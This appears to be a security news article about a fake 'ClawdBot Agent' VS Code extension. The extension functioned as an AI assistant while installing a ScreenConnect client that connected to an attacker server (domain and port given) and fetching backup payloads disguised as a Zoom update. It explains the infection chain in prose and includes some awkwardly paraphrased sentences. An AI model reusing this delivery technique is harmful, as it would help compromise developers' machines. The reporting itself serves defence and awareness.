Developers who use coding tools on a daily basis are the target of a malicious VS Code extension that has emerged in the digital threat landscape This article explores code extension attackers. . The phony "ClawdBot Agent" extension, which was found on January 27, 2026, posed as a trustworthy AI-powered assistant but actually carried a dangerous payload.

This impostor successfully registered the name first and deceived users into installing it, in contrast to the real Clawdbot service, which never published an official VS Code extension. Security monitoring systems were alerted to the threat right away, and as soon as VS Code launched, they noticed strange activity. There is more to the deception than just name theft. The extension integrated with well-known AI providers like OpenAI, Anthropic, and Google, working precisely as promised.

Because users had no reason to suspect malicious activity, this functional feature gave them a false sense of security. The extension silently installed malware on Windows computers without the user's knowledge or consent within seconds of installation. After being notified, Microsoft took quick action and took the extension off its marketplace.

After conducting a thorough investigation, Aikido security analysts determined the actual nature of this threat. They found that the extension included code that was intended to execute automatically each time Visual Studio Code launched. In order to obtain configuration instructions, the JavaScript code connected to an external server. From there, it downloaded and ran several malicious files that were disguised as genuine system components.

ScreenConnect Deployment and Infection Mechanism The way the attackers weaponized trustworthy remote access software is the most alarming feature.

The dropper used a reliable IT support tool called ScreenConnect, which was set up to connect to servers under attacker control at meeting.bulletmailer.net on port 8041. Using the VS Code extension, the attackers distributed pre-configured client installers and their own ScreenConnect relay server. Unbeknownst to the victims, they were given a fully functional ScreenConnect client, which instantly created remote connections to the attacker's infrastructure.

A Rust-based DLL file provided redundant delivery capability, fetching backup payloads from Dropbox disguised as a Zoom update. Even if the main command-and-control servers were turned off, this multi-layered strategy guaranteed success. The attackers demonstrated advanced operational planning by using three different fallback mechanisms. After installing this extension, users should block the infrastructure domains, remove ScreenConnect from their computers, and uninstall it right away.

Rotating API keys for any AI services accessed through the extension is strongly recommended. The danger emphasizes how crucial it is to confirm the legitimacy of extensions before installing them. Set CSN as a Preferred Source in Google to Receive More Instant Updates from LinkedIn and X.